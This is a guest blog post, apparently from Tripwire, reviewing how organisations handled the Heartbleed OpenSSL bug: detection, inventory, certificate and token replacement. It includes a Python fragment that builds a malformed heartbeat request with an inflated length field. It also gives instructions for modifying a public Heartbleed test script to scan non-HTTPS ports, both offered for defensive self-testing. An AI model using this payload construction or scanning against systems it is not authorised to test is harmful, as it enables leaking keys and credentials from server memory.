
Last week was Heartbleed week. Experts call it the biggest security lapse of the last few years, and both the mainstream and the industry press have spent a lot of time explaining what it is and how it can be fixed. You would expect that everything on the subject has been said by now, as the fix is known and has already been applied in many cases.

So it was just a bothersome bug, and we can get back to business as usual. Right? No. The Heartbleed bug reveals a lot about how we deal with these kinds of crises.

With all the effort put into structuring security over the last few years, the process should have been established by now. In this postmortem we will explore the handling of the crisis to see what went right and where we need to improve.

The recovery operation for the Heartbleed bug has not been very systematic; to put it plainly, it looks like a set of chaotically applied emergency bandages. If this process does not improve, we will find ourselves in the same situation next time. And this crisis is far from over.


The news of the Heartbleed bug reached us from all sides at once: the mainstream press, the security press, Twitter. Why did it happen like this? Because it was a critical gap in a product used on a massive scale; two-thirds of all Internet-enabled devices are said to use OpenSSL. Similar gaps also occur in less commonly used software, but there are almost no products in use as widely as OpenSSL.

If your organization depends on the mainstream media for security alerts, you will miss nearly all critical defects in any software less prominent than OpenSSL. Mainstream outlets such as Slate magazine normally pay no attention to software bugs. It is very likely that your organization runs more than just the most commonly used software, so if there were a super-critical bug in it right now, would you know about it? The answer is almost certainly no.

It is somewhat of a coincidence that this bug has drawn so much attention. The very critical Pass the Hash attack technique disclosed in 2013 almost certainly affected a larger part of the world than Heartbleed, since it affected every network with Microsoft products.

But the mainstream press did not run that story, and if your business depends on information drawn from the mainstream press, your organization missed it too.


How quickly did we know the full impact of Heartbleed when the news arrived? Have we established the full impact even now? How could you figure out which machines are running the faulty software?

OpenSSL is tucked away deep under the hood of many products, even products where you would least expect it; it is sometimes even embedded in hardware. There is a well-known test tool, but it only tests for Heartbleed on websites.

OpenSSL is not only embedded in websites but also in many other products, such as VPNs, directories, mail servers, and more. So how do you know whether you are vulnerable to the Heartbleed bug, and, even more important, how would you know when the crisis has subsided?

Of course you can wait until the vendor reports something. A survey of some major suppliers makes it clear that you must follow the staff blog to pick this up. At other companies you need to check the security advisories, while some vendors have nothing to offer, or ask for patience while they work on a solution.

There are no standards for this type of disclosure, so it is not easy to make a proper inventory. Moreover, you need to know exactly what you have in-house and which suppliers you have to look to for a fix for a particular bug.

Another approach is to start testing yourself. The test tool mentioned above is only suitable for websites, but that does not mean other systems are difficult to test. Indeed, it is quite possible to test them.

The Heartbleed bug is an error in a specific SSL function. This function, known as the heartbeat function, was proposed and written by Dr. Seggelmann and is intended to maintain an SSL session when the underlying protocol cannot maintain it. Instead of tearing down and restarting an SSL session, the client sends a heartbeat call that keeps the session open, so no new ‘expensive’ SSL session needs to be negotiated.

The bug that Heartbleed abuses is in the implementation of the heartbeat response. To make a heartbeat call, a client sends a series of bytes and specifies the length of that series. OpenSSL stores this information, sends the bytes back, and the session continues.

In an attack it goes as follows: instead of stating how many bytes it actually sends, the client claims a larger number of bytes than it sent. OpenSSL then retrieves more bytes from memory than were sent and returns them, along with potentially sensitive information. That’s all there is to it.
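The shape of that malformed message can be sketched in a few lines. The following Python fragment is an illustration of the heartbeat record layout described in RFC 6520, not a working exploit; it builds an honest and a dishonest request whose only difference is the claimed payload length:

```python
import struct

def heartbeat_request(payload: bytes, claimed_length: int) -> bytes:
    """Build a TLS heartbeat request record. A benign client sets
    claimed_length == len(payload); an attacker inflates it."""
    # HeartbeatMessage: type (1 = request), payload_length, payload
    hb = struct.pack('>BH', 1, claimed_length) + payload
    # TLS record header: content type 24 (heartbeat), version TLS 1.1,
    # record length -- the record length is honest, the inner one is not
    return struct.pack('>BHH', 24, 0x0302, len(hb)) + hb

honest = heartbeat_request(b'ping', 4)
malicious = heartbeat_request(b'ping', 0xFFFF)  # claims 65535 bytes

# Both records carry only 4 payload bytes on the wire...
assert len(honest) == len(malicious) == 5 + 3 + 4
# ...but the inner length field of the malicious one claims far more
assert struct.unpack('>H', malicious[6:8])[0] == 0xFFFF
```

A vulnerable server trusts the claimed length and echoes that many bytes back, so the malicious request returns up to 64 KB of whatever happens to sit in memory next to the four real payload bytes.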

Because the problem is in the software that creates and maintains the SSL session, protocols that operate on top of SSL, such as FTPS, SMTPS, POP3S and IMAPS, are all compromised. (SSH, despite the similar name, is a separate protocol and is not affected in this way.) SSL acts on the layer below HTTP, and must therefore be tested on that layer. Mail servers, for example, which only handle POP3, will probably not be tested right now, but may very well be equally vulnerable.

It is not so difficult to adapt the Heartbleed test to other types of servers. Follow these steps to test machines other than HTTP servers:

1: Download the test script project mentioned above.
2: Add the following to the command-line options (somewhere between lines 35-46 of the script):
options.add_option('--port', '-p', type='int', dest="port", default=443, help="check port, useful for scanning non-https servers")
3: Next, search the script for the text ‘443’. There are two hits: the first is in the line just added; the second is a bit further down in the script.
4: Replace the second hit: change s.connect((host, 443)) to s.connect((host, opts.port))

From that point on you can use the -p option to test a non-HTTP port. This way you can determine single-handedly whether a device is vulnerable. Which brings us to the last question…
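The change described in steps 2 to 4 can also be sketched in isolation. This standalone fragment mirrors the script’s optparse usage (variable names are illustrative) and shows how the new option flows into the connect call:

```python
from optparse import OptionParser

# Step 2: add a --port option alongside the script's existing ones
options = OptionParser(usage='%prog server [options]')
options.add_option('--port', '-p', type='int', dest='port', default=443,
                   help='check port, useful for scanning non-https servers')

# Steps 3-4: the hard-coded port in the connect call becomes opts.port,
# i.e. s.connect((host, 443)) turns into s.connect((host, opts.port))
opts, args = options.parse_args(['example.com', '-p', '995'])
host = args[0]
print(host, opts.port)  # prints: example.com 995
```

Note the type='int': with it, the parsed value can be passed straight to s.connect((host, opts.port)); without it, optparse would hand the socket a string.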

Decide and Act

Are you responding properly? Have all vulnerable components been found and patched, all potentially sensitive materials replaced, and all users and customers sufficiently informed? According to most suppliers, you need to replace all certificates, passwords and the like.

The American and the Dutch governments agree with the suppliers; replace everything.

In practice, very few organizations have replaced their certificates as Netstat did on April 11th. That means most organizations have not (yet) implemented the advice to replace everything. A good reason may be that the certificate revocation system of CRLs and OCSP cannot handle such massive numbers of revocations.

What ‘everything’ means is also far from clear. Look at token suppliers, for example: many strong authentication products may have been affected through the products they work with, such as the well-known login tokens used by banks and the software tokens installed on phones. A good explanation of how they work and what the solution might look like for OTP tokens can be read here.

It is exactly as the suppliers of hardware tokens report, whether or not they do so prominently: the tokens need new keying material. This means a huge logistical operation is required to re-initialize or replace hardware tokens.

Every customer would therefore have to request new hardware tokens from their bank. Ouch. Would they really do this?

In practice it is really difficult to replace these tokens. It is understandable that organizations have doubts about what to do, given the cost and potential impact. After all, we do not know whether any information has been leaked, and we may never know.

Replacing everything that may have been compromised is a large and costly operation. In an operation of that size, big mistakes can also be made, as Akamai found out. Let’s chalk that one up to acting before thinking it through completely.

There is much appeal in ignoring this entire situation as much as possible. The disadvantage of blissful ignorance is that you will not learn from Heartbleed. Carrying on and learning is vital because the Heartbleed crisis is not over yet. Even worse, it is just a taste of crises that are certain to come.


About the Authors:

Bram van Pelt is a technical security consultant at Traxion consultancy. Over the last four years Bram has been involved in several large-scale security projects. As a technical subject-matter expert he has also given talks and written papers on both Identity & Access Management and penetration testing.

Peter Rietveld is an authority in the field of computer and information security, with nearly twenty years’ experience as a system architect, developer, penetration tester and cryptanalyst. As a security advisor at Traxion he advises organizations in ICT, the aviation industry, telecom, finance, government and health care. His forward-looking publication on the future of access control is available online under the Dutch title ‘Toekomst van de Toegang’ (‘The Future of Access’). For years he has been a regular contributor of timely and insightful commentary on issues in IT security. He is currently working on a thought-provoking new book on cyber doctrines.

Editor’s Note: The opinions expressed in this and other guest author articles are solely those of the contributor, and do not necessarily reflect those of Tripwire, Inc.



